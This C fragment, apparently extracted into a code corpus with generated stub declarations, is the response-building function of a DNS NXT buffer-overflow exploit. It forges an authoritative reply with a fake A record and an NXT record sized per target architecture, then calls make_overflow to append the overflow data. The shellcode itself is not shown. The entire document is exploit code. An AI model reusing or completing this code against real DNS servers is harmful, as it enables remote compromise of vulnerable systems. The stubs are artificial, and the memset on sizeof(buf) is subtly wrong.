
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_5__ TYPE_3__ ;
typedef struct TYPE_4__ TYPE_1__ ;


typedef int buf ;
struct TYPE_5__ {int length; } ;
struct TYPE_4__ {int qr; int aa; scalar_t__ rcode; void* arcount; void* ancount; void* qdcount; int id; } ;
typedef TYPE_1__ HEADER ;


 int PUTLONG (int,char*) ;
 int PUTSHORT (int,char*) ;
 int T_A ;
 int T_NXT ;
 size_t arch ;
 TYPE_3__* archlist ;
 char* dnsaddlabel (char*,char*) ;
 char* dnssprintflabel (char*,char*,char*) ;
 void* htons (int) ;
 int make_overflow (char*) ;
 int memset (char*,int ,int) ;
 int ntohs (int) ;
 int printf (char*,char*,int) ;
 int sprintf (char*,char*,...) ;
 int strlen (char*) ;

int form_response(HEADER *packet, char *buf)
{
  char query[512];
  int qtype;
  HEADER *dnsh;
  char *p;
  char *walker;

  memset(buf,0,sizeof(buf));

  dnsh = (HEADER *) buf;
  dnsh->id = packet->id;
  dnsh->qr=1;
  dnsh->aa=1;
  dnsh->qdcount = htons(1);
  dnsh->ancount = htons(1);
  dnsh->arcount = htons(1);
  dnsh->rcode = 0;

  walker=(char*)(dnsh+1);

  p=dnssprintflabel(query, (char *)packet, (char*)(packet+1));
  query[strlen(query) - 1] = 0;

  qtype=*((unsigned short *)p);

  printf("%s type=%d\n",query, ntohs(qtype));



  walker=dnsaddlabel(walker, query);
  PUTSHORT(ntohs(qtype), walker);

  PUTSHORT(1,walker);




  walker=dnsaddlabel(walker, query);
  PUTSHORT(T_A, walker);
  PUTSHORT(1, walker);
  PUTLONG(60*5, walker);
  PUTSHORT(4, walker);
  sprintf(walker,"%c%c%c%c",1,2,3,4);
  walker+=4;



  walker=dnsaddlabel(walker, query);
  PUTSHORT(T_NXT, walker);
  PUTSHORT(1, walker);
  PUTLONG(60*5, walker);



  PUTSHORT(archlist[arch].length+7, walker);

  PUTSHORT(6, walker);
  sprintf(walker,"admadm");
  walker+=6;
  PUTSHORT(0, walker);

  make_overflow(walker);
  walker+=archlist[arch].length;
  PUTSHORT(0, walker);
  return walker-buf;
}
